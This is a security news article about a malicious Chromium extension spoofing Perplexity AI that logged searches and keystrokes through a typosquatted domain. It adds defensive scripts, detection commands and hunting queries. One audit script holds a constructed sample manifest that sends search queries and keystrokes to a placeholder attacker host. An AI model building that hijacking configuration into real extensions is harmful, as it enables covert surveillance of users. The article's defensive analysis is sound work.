Hidden AI Search Trap: The Malicious Chromium Extension Spoofing Perplexity AI and Hijacking User Queries + Video


Emotional Introduction: When “AI Search” Becomes a Silent Surveillance Tool

In an era where artificial intelligence tools are rapidly becoming part of everyday browsing habits, trust is the new currency—and the easiest to steal. A recent investigation by Microsoft Threat Intelligence reveals a disturbing case where a Chromium-based extension disguised itself as an AI-powered search assistant under the Perplexity AI branding. Instead of improving search, it quietly intercepted user queries, collected behavioral data, and rerouted traffic through attacker-controlled infrastructure. What looked like innovation was, in reality, a carefully engineered surveillance pipeline hidden inside the browser itself.

Summary of the Incident: What Actually Happened

Microsoft researchers discovered a malicious browser extension named “Search for perplexity ai” that impersonated Perplexity AI. The extension used typosquatted infrastructure (perplexity-ai[.]online) to intercept search queries and real-time keystrokes typed into the browser’s address bar.

Instead of directly sending users to legitimate search engines, the extension first routed all queries through attacker-controlled servers. These servers logged full request metadata—including IP addresses, headers, and typed characters—before redirecting users to normal search results. This created a “silent interception layer” that users never noticed.

Although no direct credential theft was confirmed, the architecture clearly enabled large-scale behavioral tracking and potential profiling.

Extension Overview: A Fake AI Tool with Real Control

The extension appeared legitimate at first glance, presenting itself as an AI-enhanced search assistant. It even forced itself as the default search provider inside Chromium-based browsers.

Key attributes included:

Name: Search for perplexity ai

Extension ID: flkebkiofojicogddingbdmcmkpbplcd

Manifest Version: MV3

Infrastructure: perplexity-ai[.]online

The extension spoofed branding from Perplexity AI, misleading users into believing it was affiliated with a trusted AI product. In reality, it functioned as a traffic interception and data collection system.

How Search Hijacking Worked Behind the Scenes

The extension manipulated Chromium’s search configuration using chrome_settings_overrides, forcing all searches through attacker infrastructure.

Every query followed this path:

User types → Browser Omnibox → attacker domain → logging → redirect → real search engine

Even more concerning, the suggest_url feature captured every keystroke in real time, meaning partial queries were transmitted before the user pressed Enter.

This is no longer simple search hijacking. It is behavioral telemetry capture disguised as search assistance.

Two-Hop Redirection: The Invisible Data Theft Pipeline

The extension used a “two-hop” system:

Query is sent to attacker-controlled domain

Server logs full request data

Immediate redirect to legitimate search engine

This ensures users see normal results while unaware of interception.

The attacker gains:

Search intent profiling

Typing behavior patterns

Device fingerprinting

Network metadata

This separation between “data capture” and “user experience” is what makes the attack particularly stealthy.

Abuse of DeclarativeNetRequest APIs

The extension leveraged powerful MV3 APIs:

declarativeNetRequest

declarativeNetRequestFeedback

declarativeNetRequestWithHostAccess

These allowed:

Real-time URL rewriting

Traffic interception

Rule execution monitoring

Domain-level request control

Such permissions are highly unusual for a search tool and indicate deliberate architectural planning for surveillance rather than functionality.

Modular Attack Infrastructure: Designed for Expansion

The extension included rule sets for multiple search engines:

Perplexity

Google

Bing

Although only Perplexity rules were active, the structure allowed instant activation of additional hijacking targets.

This modular design suggests a scalable framework rather than a single-purpose malicious tool.
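The search-provider override, the declarativeNetRequest permissions and the dormant per-engine rule sets described in the three sections above are all declared in an extension's manifest.json, so a defender can audit for them offline without running the extension. The script below is an added example written for this article; it is not code from Microsoft and not the extension's own code. Its sample manifest is constructed to have the shape described above, with the placeholder host search.attacker-intermediary.example standing in for the real typosquatted domain, and KNOWN_SEARCH_HOSTS is an assumed, deliberately short allowlist.

```python
import json
import os
from urllib.parse import urlparse

# Hosts a benign search extension is expected to send search_url / suggest_url to.
# Assumed allowlist, kept short for the example; extend it for your own estate.
KNOWN_SEARCH_HOSTS = {"www.perplexity.ai", "www.google.com", "www.bing.com"}

# Permissions that let an extension rewrite or observe network requests.
NET_CONTROL_PERMS = {
    "declarativeNetRequest", "declarativeNetRequestFeedback",
    "declarativeNetRequestWithHostAccess", "webRequest", "webRequestBlocking",
}


def host_of(template_url):
    """Hostname of a search template such as https://x.example/s?q={searchTerms}."""
    return urlparse(template_url).hostname or ""


def audit_manifest(manifest):
    """Return (severity, message) findings for one parsed manifest.json."""
    findings = []
    provider = manifest.get("chrome_settings_overrides", {}).get("search_provider", {})
    for key in ("search_url", "suggest_url"):
        url = provider.get(key)
        if url and host_of(url) not in KNOWN_SEARCH_HOSTS:
            note = " (receives every keystroke before Enter)" if key == "suggest_url" else ""
            findings.append(("high", f"{key} -> unknown host {host_of(url)}{note}"))
    if provider.get("is_default"):
        findings.append(("medium", "sets itself as the default search provider"))
    perms = NET_CONTROL_PERMS & set(manifest.get("permissions", []))
    if perms:
        findings.append(("medium", "request-control permissions: " + ", ".join(sorted(perms))))
    for ruleset in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        # A shipped-but-disabled ruleset is a staged target that can be switched on later.
        if ruleset.get("enabled"):
            findings.append(("medium", f"DNR ruleset {ruleset.get('id')} is enabled"))
        else:
            findings.append(("high", f"DNR ruleset {ruleset.get('id')} is shipped but dormant"))
    return findings


def is_suspicious(manifest):
    """True when any high-severity finding is present."""
    return any(sev == "high" for sev, _ in audit_manifest(manifest))


def scan_profile(extensions_dir):
    """Audit every <extensions_dir>/<id>/<version>/manifest.json; returns {id/version: findings}."""
    report = {}
    if not os.path.isdir(extensions_dir):
        return report
    for ext_id in sorted(os.listdir(extensions_dir)):
        ext_dir = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(ext_dir):
            continue
        for version in os.listdir(ext_dir):
            path = os.path.join(ext_dir, version, "manifest.json")
            if os.path.isfile(path):
                with open(path, encoding="utf-8") as fh:
                    report[f"{ext_id}/{version}"] = audit_manifest(json.load(fh))
    return report


# Constructed sample with the shape described in the article; the host is a placeholder,
# not the real typosquatted domain, and the rule file names are illustrative.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3,
    "name": "Search helper (constructed sample)",
    "permissions": ["declarativeNetRequest", "declarativeNetRequestFeedback",
                    "declarativeNetRequestWithHostAccess"],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "AI search", "keyword": "ai", "encoding": "UTF-8", "is_default": True,
            "search_url": "https://search.attacker-intermediary.example/?q={searchTerms}",
            "suggest_url": "https://search.attacker-intermediary.example/suggest?q={searchTerms}",
        }
    },
    "declarative_net_request": {
        "rule_resources": [
            {"id": "perplexity", "enabled": True, "path": "rules/perplexity.json"},
            {"id": "google", "enabled": False, "path": "rules/google.json"},
            {"id": "bing", "enabled": False, "path": "rules/bing.json"},
        ]
    },
}

# Constructed benign counterpart: a known engine, not default, no request control.
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Plain search shortcut (constructed sample)",
    "permissions": [],
    "chrome_settings_overrides": {
        "search_provider": {"name": "Bing", "keyword": "b", "encoding": "UTF-8",
                            "is_default": False,
                            "search_url": "https://www.bing.com/search?q={searchTerms}"}
    },
}

if __name__ == "__main__":
    for label, m in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, "->", "SUSPICIOUS" if is_suspicious(m) else "ok")
        for sev, msg in audit_manifest(m):
            print(f"  [{sev}] {msg}")
    # Real profile (Linux path shown); pass the Windows or macOS Extensions directory instead.
    profile = os.path.expanduser("~/.config/google-chrome/Default/Extensions")
    for key, findings in scan_profile(profile).items():
        if any(sev == "high" for sev, _ in findings):
            print(key, findings)
```

The two findings that matter most are the ones the article singles out: a suggest_url host outside the allowlist (partial queries leave the browser on every keystroke) and rule sets that are packaged but disabled, which a benign search tool has no reason to ship.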

Server-Side Logging: The Proof of Intent

Unlike typical browser malware, this extension shipped with full backend infrastructure:

Node.js server logging every request

Nginx proxy handling search suggestions

SSL configuration via Let’s Encrypt

CORS manipulation for cross-origin access

This confirms intentional data harvesting. The system was not improvised—it was engineered.

Dynamic Behavior: Onboarding as Psychological Manipulation

When installed, the extension redirected users to a fake onboarding page mimicking legitimate setup flows.

Hosted on a deceptive domain, it reinforced trust while quietly modifying browser settings in the background. This is a classic social engineering tactic: build comfort first, then execute control.

Security Implications: Why This Attack Matters

This incident highlights a deeper trend in modern cyber threats:

AI branding increases user trust

Browser extensions remain highly privileged

MV3 APIs still enable complex abuse

Keystroke-level data is now interceptable without malware flags

Even without credential theft, the harvested data is enough for:

Behavioral profiling

Targeted advertising manipulation

Future phishing personalization

Mitigation Strategies from Microsoft

Microsoft recommends:

Restricting extension installation via enterprise policies

Enforcing allow-lists for browser add-ons

Monitoring search provider changes

Blocking unknown intermediary domains

Using reputation-based filtering systems

Deploying Microsoft Defender SmartScreen protections

These layered defenses aim to detect both known threats and behavioral anomalies.
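Several of the recommendations above (restricting installation, allow-listing add-ons, monitoring the search provider) map directly onto Chromium's managed policies. The script below is an added example for this article, not Microsoft's code and not part of any product; it audits a policy dictionary for those gaps and carries a constructed weak policy, which only blocks the single extension ID reported above, beside a hardened one. APPROVED_SEARCH_HOSTS is an assumed allowlist and the allow-listed ID in HARDENED_POLICY is a placeholder for an approved extension.

```python
import json
import re
from urllib.parse import urlparse

# Search hosts the organisation is willing to pin as the browser default (assumed list).
APPROVED_SEARCH_HOSTS = {"www.google.com", "www.bing.com", "www.perplexity.ai"}
EXT_ID = re.compile(r"[a-p]{32}")          # Chrome extension IDs are 32 letters a-p
INSTALLABLE = {"allowed", "force_installed", "normal_installed"}


def deny_by_default(policy):
    """True if unlisted extensions cannot be installed, via either policy form."""
    if "*" in policy.get("ExtensionInstallBlocklist", []):
        return True
    star = policy.get("ExtensionSettings", {}).get("*", {})
    return star.get("installation_mode") in ("blocked", "removed")


def approved_ids(policy):
    """Extension IDs the policy explicitly permits."""
    ids = list(policy.get("ExtensionInstallAllowlist", []))
    ids += [k for k, v in policy.get("ExtensionSettings", {}).items()
            if k != "*" and v.get("installation_mode") in INSTALLABLE]
    return ids


def _host(url):
    return urlparse(url).hostname or ""


def audit_policy(policy):
    """Return human-readable gaps in a Chrome/Edge-style managed policy dict."""
    findings = []
    if not deny_by_default(policy):
        findings.append("extensions are allow-by-default: set ExtensionInstallBlocklist to ['*'] "
                        "(blocking single known-bad IDs is reactive)")
    ids = approved_ids(policy)
    if deny_by_default(policy) and not ids:
        findings.append("deny-by-default with no allowlist entries; list approved extension IDs")
    for ext_id in ids:
        if not EXT_ID.fullmatch(ext_id):
            findings.append(f"allowlist entry {ext_id!r} is not a 32-letter extension ID")
    if policy.get("DefaultSearchProviderEnabled") is not True:
        findings.append("DefaultSearchProviderEnabled is not true, so the default search provider "
                        "is not policy-pinned and remains changeable by users and extensions")
    else:
        url = policy.get("DefaultSearchProviderSearchURL")
        if not url:
            findings.append("DefaultSearchProviderSearchURL missing; the pin has no effect")
        elif _host(url) not in APPROVED_SEARCH_HOSTS:
            findings.append(f"DefaultSearchProviderSearchURL host {_host(url)} is not approved")
        sug = policy.get("DefaultSearchProviderSuggestURL")
        if sug and _host(sug) not in APPROVED_SEARCH_HOSTS:
            findings.append(f"DefaultSearchProviderSuggestURL host {_host(sug)} is not approved")
    return findings


# Constructed weak policy: blocks only the one ID reported by Microsoft (ID taken from the article).
WEAK_POLICY = {
    "ExtensionInstallBlocklist": ["flkebkiofojicogddingbdmcmkpbplcd"],
}

# Constructed hardened policy; the allow-listed ID is a placeholder for an approved extension.
HARDENED_POLICY = {
    "ExtensionInstallBlocklist": ["*"],
    "ExtensionInstallAllowlist": ["abcdefghijklmnopabcdefghijklmnop"],
    "DefaultSearchProviderEnabled": True,
    "DefaultSearchProviderName": "Google",
    "DefaultSearchProviderSearchURL": "https://www.google.com/search?q={searchTerms}",
}

if __name__ == "__main__":
    for label, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, audit_policy(pol) or ["no gaps"])
    print(json.dumps(HARDENED_POLICY, indent=2))   # ready for the managed-policy directory
```

On Linux the hardened dictionary can be dropped as a JSON file under /etc/opt/chrome/policies/managed/; on Windows the same policy names live under HKLM\Software\Policies\Google\Chrome. The point of the weak example is that blocking one known extension ID leaves the default search provider and every other unknown extension exactly as exposed as before.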

What Undercode Says:

Browser extensions are now equivalent to lightweight malware if misused

AI branding significantly lowers user suspicion thresholds

MV3 security model still allows deep request interception

Typosquatting remains one of the most effective social engineering tools

Search hijacking has evolved into behavioral surveillance

Keystroke capture can occur without traditional keyloggers

Users rarely inspect suggest_url behavior in extensions

Redirect-based attacks hide data theft behind legitimate services

Modular rule engines indicate reusable cybercrime infrastructure

Search engines are now indirect data collection endpoints

“AI assistant” labeling is being exploited as trust camouflage

Browser APIs remain a high-value attack surface

Server-side logging is often the real payload, not the extension itself

Security awareness training must include extension hygiene

Extension onboarding pages are psychological trust traps

DNS-like domain mimicry increases install rates

Real-time suggestions are more sensitive than search queries

Default search override is a persistent control vector

Multi-engine hijacking frameworks suggest scalability goals

CORS misconfiguration enables cross-origin data flow abuse

Proxy-based logging hides malicious intent from client-side inspection

Extension stores remain reactive, not proactive in enforcement

AI-themed extensions are disproportionately risky

User behavior data is more valuable than credentials in many cases

Two-hop redirect architecture reduces detection probability

Security telemetry often misses short-lived query interception

Browser trust boundaries are increasingly blurred

MV3 reduces but does not eliminate abuse potential

Threat actors prioritize stealth over disruption

Search suggestions are an underprotected data channel

Extension permissions are rarely audited by users

Branding impersonation is more effective than phishing links

Infrastructure separation hides attribution signals

Logging headers provides deep fingerprinting capability

AI hype cycles accelerate malware distribution success

Enterprise environments are not immune without strict controls

User experience continuity masks malicious interception

Search hijacking now functions as intelligence gathering

Detection requires behavioral, not signature-based systems

Browser extensions remain one of the most underestimated threats

❌ The extension is confirmed malicious based on Microsoft analysis and was taken down after disclosure.

❌ It does not need credential theft to be dangerous; search and keystroke interception alone are high-risk.

⚠️ While no direct password theft was observed, the logging infrastructure enables potential future abuse or expansion of capabilities.

Overall assessment: The technical findings strongly support the claim of intentional data interception and search hijacking behavior, with multiple independent indicators confirming malicious design patterns.

Prediction:

AI-themed browser extensions will become a primary vector for stealth data collection campaigns.

Attackers will increasingly rely on brand impersonation, especially AI tools, to bypass user skepticism.

More extensions will adopt MV3-compliant “legitimate-looking” architectures.

Search interception will evolve into full behavioral analytics pipelines.

AI branding will continue to reduce detection probability among non-technical users.

🔮 The next wave of browser threats will likely look less like malware—and more like productivity tools.

Deep Analysis (Security Engineering & Detection Commands)

Check installed Chromium extensions (Linux)

ls ~/.config/google-chrome/Default/Extensions/

Inspect a suspicious extension ID (the manifest sits under a version subdirectory, hence the wildcard)

cat ~/.config/google-chrome/Default/Extensions/flkebkiofojicogddingbdmcmkpbplcd/*/manifest.json

Monitor DNS requests for typosquatted domains (filter on port 53 so the lookup itself is seen; a plain "host" filter only matches traffic to the resolved address, after the redirect has already happened)

sudo tcpdump -l -n -i any port 53 | grep -i "perplexity-ai"

Windows: list extensions registered through the registry (these keys hold externally installed extensions; per-profile extensions live under %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions)

reg query HKCU\Software\Google\Chrome\Extensions /s
reg query HKLM\Software\Google\Chrome\Extensions /s

Detect outbound traffic to unknown search intermediaries (Windows; map the PID column back to a process with tasklist)

netstat -ano | findstr ":443"

macOS: check Chrome extension directory

ls ~/Library/Application\ Support/Google/Chrome/Default/Extensions/

Hunt for search hijacking behavior (Microsoft Defender XDR advanced hunting, KQL; the search string must be quoted)

DeviceNetworkEvents
| where RemoteUrl contains "perplexity-ai"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP

Detect default search provider modifications (Linux; the Preferences file is single-line JSON, so extract the search-provider object instead of grepping all of ~/.config, then compare the url and suggestions_url hosts with the engine you expect)

grep -o '"default_search_provider_data":{[^}]*}' ~/.config/google-chrome/Default/Preferences
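The DNS and advanced-hunting commands above look for one known typosquatted domain. The script below generalises that hunt to any domain that imitates a protected brand, which catches the next look-alike as well as the one reported here. It is an added example for this article, not Microsoft's code or a product feature; the resolver log lines are constructed in dnsmasq's format (only perplexity-ai.online is taken from the article), PROTECTED is an assumed brand map, and registrable() deliberately uses no public-suffix list.

```python
import re

# Brands to protect and the registrable domains that genuinely serve them (assumed list).
PROTECTED = {
    "perplexity": {"perplexity.ai"},
    "google": {"google.com"},
    "bing": {"bing.com"},
}
LEGIT_DOMAINS = set().union(*PROTECTED.values())

# Constructed dnsmasq-style resolver log; only the typosquatted domain comes from the article.
SAMPLE_LOG = """\
Mar 01 10:12:01 dnsmasq[812]: query[A] www.perplexity.ai from 10.0.0.5
Mar 01 10:12:03 dnsmasq[812]: query[A] perplexity-ai.online from 10.0.0.5
Mar 01 10:12:04 dnsmasq[812]: query[A] www.google.com from 10.0.0.7
Mar 01 10:12:05 dnsmasq[812]: query[A] perplexlty.ai from 10.0.0.9
Mar 01 10:12:06 dnsmasq[812]: query[AAAA] cdn.example.org from 10.0.0.7
Mar 01 10:12:07 dnsmasq[812]: query[A] bing-search.example from 10.0.0.5
"""
QUERY_RE = re.compile(r"query\[\w+\] (?P<name>\S+) from (?P<client>\S+)")


def registrable(name):
    """Last two labels of a name. Assumption: no public-suffix list, so co.uk-style
    suffixes are not handled; use a PSL library for production."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Plain edit distance, used to catch single-character typos of a brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(name):
    """Why `name` imitates a protected brand without being its real domain, or None."""
    dom = registrable(name)
    if dom in LEGIT_DOMAINS:
        return None
    token = dom.split(".")[0].replace("-", "")      # 'perplexity-ai' -> 'perplexityai'
    for brand in PROTECTED:
        if brand in token:
            return f"embeds brand '{brand}' outside its real domain"
        max_dist = 1 if len(brand) < 6 else 2        # short brands get a tighter threshold
        if levenshtein(token, brand) <= max_dist:
            return f"within edit distance {max_dist} of '{brand}'"
    return None


def scan_log(text):
    """Return one hit per query line whose name looks like a brand impersonation."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m and (reason := lookalike_reason(m["name"])):
            hits.append({"client": m["client"], "name": m["name"], "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']:<12} {hit['name']:<24} {hit['reason']}")
```

Feeding the hits into a block list closes the two-hop path at the first hop: if the intermediary never resolves, neither the query nor the keystroke stream leaves the network, whatever the extension's rules say.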



References:

Reported By: www.microsoft.com
